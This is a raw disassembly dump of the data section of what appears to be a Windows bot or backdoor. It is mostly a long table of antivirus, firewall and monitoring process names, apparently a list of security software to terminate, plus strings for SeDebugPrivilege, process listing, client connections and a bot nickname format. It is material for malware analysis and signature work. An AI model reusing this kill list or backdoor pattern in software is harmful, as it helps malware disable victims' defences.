align 4
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:00431BB4�o
align 10h
dd 0
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:00431BB0�o
dd 0
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:00431BAC�o
align 8
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:00431BA8�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:00431BA4�o
align 8
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:00431BA0�o
align 8
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:00431B9C�o
align 8
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:00431B98�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:00431B94�o
dd 0
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:00431B90�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:00431B8C�o
align 10h
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:00431B88�o
align 10h
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:00431B84�o
align 10h
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:00431B80�o
align 8
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:00431B7C�o
align 8
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:00431B78�o
align 8
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:00431B74�o
align 10h
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:00431B70�o
align 10h
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:00431B6C�o
align 10h
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:00431B64�o
; .data:00431B68�o
align 10h
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:00431B60�o
align 10h
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:00431B5C�o
align 10h
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:00431B58�o
align 10h
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:00431B54�o
align 10h
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:00431B50�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:00431B4C�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:00431B48�o
align 4
dd 0
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:00431B44�o
align 10h
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:00431B40�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:00431B38�o
; .data:00431B3C�o
align 4
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:00431B34�o
align 8
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:00431B30�o
align 8
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:00431B2C�o
align 8
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:00431B28�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:00431B24�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:00431B20�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:00431B1C�o
align 4
dd 0
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:00431B18�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:00431B14�o
align 4
dd 0
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:00431B10�o
align 4
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:00431B0C�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:00431B08�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:00431B04�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:00431B00�o
dd 0
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:00431AFC�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:00431AF8�o
align 10h
dd 0
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:00431AF4�o
align 10h
dd 0
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:00431AF0�o
align 10h
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:00431AEC�o
align 10h
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:00431AE8�o
align 4
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:00431AE4�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:00431AE0�o
align 4
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:00431ADC�o
align 10h
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:00431AD8�o
align 4
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:00431AD4�o
dd 0
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:00431AD0�o
align 4
dd 0
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:00431ACC�o
align 4
dd 0
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:00431AC8�o
align 4
dd 0
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:00431AC4�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:00431AC0�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:00431ABC�o
dd 0
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:00431AB8�o
dd 0
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:00431AB4�o
align 10h
dd 0
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:00431AB0�o
align 10h
dd 0
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:00431AAC�o
align 10h
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:00431AA8�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:00431AA4�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:00431AA0�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:00431A9C�o
dd 0
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:00431A98�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:00431A94�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:00431A90�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:00431A8C�o
align 4
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:00431A88�o
align 10h
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:00431A84�o
align 10h
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:00431A7C�o
; .data:00431A80�o
align 10h
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:00431A78�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:00431A74�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:00431A70�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:00431A6C�o
dd 0
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:00431A68�o
align 4
dd 0
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:00431A64�o
align 4
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:00431A60�o
dd 0
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:00431A5C�o
align 4
dd 0
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:00431A58�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:00431A54�o
align 4
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:00431A50�o
align 10h
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:00431A4C�o
align 10h
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:00431A48�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:00431A44�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:00431A40�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:00431A3C�o
align 4
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:00431A38�o
align 8
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:00431A34�o
align 10h
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:00431A30�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:00431A2C�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:00431A28�o
align 8
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:00431A24�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:00431A20�o
align 8
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:00431A1C�o
align 8
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:00431A18�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:00431A14�o
align 10h
dd 0
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:00431A10�o
align 10h
dd 0
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:00431A0C�o
align 10h
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:00431A08�o
align 10h
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:00431A04�o
align 10h
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:00431A00�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:004319FC�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:004319F8�o
align 8
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:004319F4�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:004319F0�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:004319EC�o
dd 0
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:004319E8�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:004319E4�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:004319E0�o
align 4
dd 0
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:004319DC�o
align 4
dd 0
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:004319D8�o
align 10h
dd 0
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:004319D4�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:004319D0�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:004319CC�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:004319C8�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:004319C4�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:004319C0�o
align 8
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:004319BC�o
align 8
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:004319B8�o
align 4
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:004319B4�o
align 8
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:004319B0�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:004319AC�o
align 8
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:004319A8�o
align 8
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:004319A4�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:004319A0�o
align 10h
dd 0
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:0043199C�o
align 10h
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:00431998�o
align 10h
dd 0
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:00431994�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:00431990�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:0043198C�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:00431988�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:00431984�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:00431980�o
align 10h
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:0043197C�o
dd 0
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:00431978�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:00431974�o
align 8
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:00431970�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:0043196C�o
align 8
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:00431968�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:00431964�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:00431960�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:0043195C�o
dd 0
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:00431958�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:00431954�o
align 10h
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:00431950�o
align 10h
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:0043194C�o
dd 0
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:00431948�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:00431944�o
align 8
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:00431940�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:0043193C�o
align 4
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:00431938�o
align 10h
dd 0
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:00431934�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:00431930�o
align 8
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:0043192C�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:00431928�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:00431924�o
align 8
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:0043191C�o
align 8
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:00431918�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:00431914�o
align 8
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:00431910�o
align 10h
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:0043190C�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:00431908�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:00431904�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:00431900�o
align 8
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:004318FC�o
align 10h
dd 0
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:004318F8�o
dd 0
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:004318F4�o
align 4
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:004318F0�o
align 10h
dd 0
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:004318EC�o
align 10h
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:004318E8�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:004318E4�o
dd 0
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:004318E0�o
align 4
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:004318DC�o
dd 0
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:004318D8�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:004318D4�o
; .data:00431920�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:004318D0�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:004318CC�o
align 8
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:004318C4�o
; .data:004318C8�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:004318C0�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:004318BC�o
align 8
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:004318B8�o
dd 0
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:004318B4�o
align 10h
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:004318B0�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:004318AC�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:004318A8�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:004318A4�o
align 8
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:004318A0�o
align 8
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:0043189C�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:00431898�o
align 10h
dd 0
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:00431894�o
align 10h
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:00431890�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:0043188C�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:00431888�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:00431884�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:00431880�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:0043187C�o
align 8
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:00431878�o
align 4
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:00431874�o
align 4
dd 0
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:00431870�o
align 4
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:0043186C�o
align 4
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:00431868�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:00431864�o
align 10h
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:00431860�o
align 10h
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:0043185C�o
align 8
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:00431858�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:00431854�o
align 8
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0043184C�o
; .data:00431850�o
align 8
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:00431848�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:00431844�o
align 10h
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:00431840�o
align 10h
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:00431838�o
; .data:0043183C�o
align 10h
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:00431834�o
align 10h
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:00431830�o
align 10h
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:0043182C�o
align 10h
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:00431828�o
align 10h
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:00431824�o
align 10h
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:0043181C�o
; .data:00431820�o
align 10h
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:00431818�o
align 10h
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:00431814�o
align 4
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:00431810�o
align 4
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:0043180C�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:00431808�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:00431804�o
align 10h
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:00431800�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:004317FC�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:004317F8�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:004317F4�o
align 10h
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:004317F0�o
align 10h
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:004317EC�o
align 10h
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:004317E8�o
align 4
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:004317E4�o
dd 0
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:004317E0�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:004317DC�o
dd 0
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:004317D8�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:004317D4�o
align 8
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:004317D0�o
align 8
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:004317CC�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:004317C8�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:004317C0�o
; .data:004317C4�o
align 8
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:004317B8�o
; .data:004317BC�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:004317B0�o
; .data:004317B4�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:004317A8�o
; .data:004317AC�o
align 8
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:004317A4�o
align 10h
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:004317A0�o
align 10h
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:00431798�o
; .data:0043179C�o
align 10h
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:00431794�o
align 10h
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:00431790�o
align 10h
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:0043178C�o
align 4
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:00431788�o
align 8
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:00431784�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:00431780�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:0043177C�o
align 4
dd 0
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:00431778�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:00431774�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:00431770�o
dd 0
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:0043176C�o
align 4
dd 0
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:00431768�o
align 4
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:00431764�o
align 4
dd 0
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:00431760�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:0043175C�o
align 4
dd 0
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:00431758�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:00431754�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:00431750�o
dd 0
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .data:off_43174C�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_411876+191�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_411876+5A�o
; sub_411876+1F3�o
align 4
dword_4348BC dd 20025B02h, 7270202Dh, 1F631F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:loc_411BB7�o
aProcessListFai db ' Process list failed.',0
align 10h
dword_4348F0 dd 20025B02h, 7270202Dh, 1F631F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00411BB0�o
aProcessListCom db ' Process list completed.',0
align 10h
dd 2 dup(0)
dword_434928 dd 20025B02h, 7270202Dh, 1F631F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: .text:00411B49�o
aListingProcess db ' Listing processes:',0
align 4
dd 2 dup(0)
dword_43495C dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: .text:00411E53�o
dd 0BB20025Dh
aFailedToSta_14 db ' Failed to start client thread, error: <%d>.',0
align 10h
dword_4349B0 dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: .text:00411DDE�o
dd 0BB20025Dh
aClientConnec_0 db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
dd 4 dup(0)
dword_434A10 dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: .text:00412091�o
dd 0BB20025Dh
aFailedToSta_15 db ' Failed to start connection thread, error: <%d>.',0
align 4
dd 3 dup(0)
dword_434A68 dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: .text:00411FC8�o
dd 0BB20025Dh, 6C432020h, 746E6569h, 6E6F6320h, 7463656Eh
dd 206E6F69h, 49206F74h, 25203A50h, 64253A73h, 6553202Ch
dd 72657672h, 72687420h, 3A646165h, 2E642520h, 5 dup(0)
aConst db 'const',0
align 10h
dd 0
dword_434AD4 dd 1 ; DATA XREF: sub_41264E+7�o
off_434AD8 dd offset sub_401046 ; DATA XREF: sub_41264E+49�r
aLetter db 'letter',0
align 8
dd 2, 4011E0h, 706D6F63h, 2 dup(0)
dd 3, 401069h, 6E756F63h, 797274h, 0
dd 4, 40128Fh, 736Fh, 2 dup(0)
dd 5, 40103Ch, 3 dup(0)
dword_434B38 dd 2 dup(0) ; DATA XREF: sub_41264E+39�o
aSI db '%s%i',0 ; DATA XREF: sub_41220B+40�o
; .text:0041235F�o ...
align 4
byte_434B48 db 50h ; DATA XREF: .text:00412302�o
; .text:0041230F�r
db 43h, 2 dup(0)
aEmr3S db 'emr3-[%s]-',0 ; DATA XREF: .text:004123D4�o
align 4
dd 0
aS_4 db '[%s]|',0 ; DATA XREF: .text:004124FB�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_4124F2�o
; sub_414190:loc_414253�o
a2k3 db '2K3',0 ; DATA XREF: .text:004124EB�o
aXp db 'XP',0 ; DATA XREF: .text:004124DD�o
; sub_414190+AA�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:004124CD�o
; sub_414190+98�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:004124B4�o
; sub_414190+7E�o
align 4
a98 db '98',0 ; DATA XREF: .text:004124A4�o
; sub_414190+6C�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:00412494�o
; sub_414190+5A�o
align 10h
a95 db '95',0 ; DATA XREF: .text:00412486�o
; sub_414190+46�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_412583+3A�o
align 4
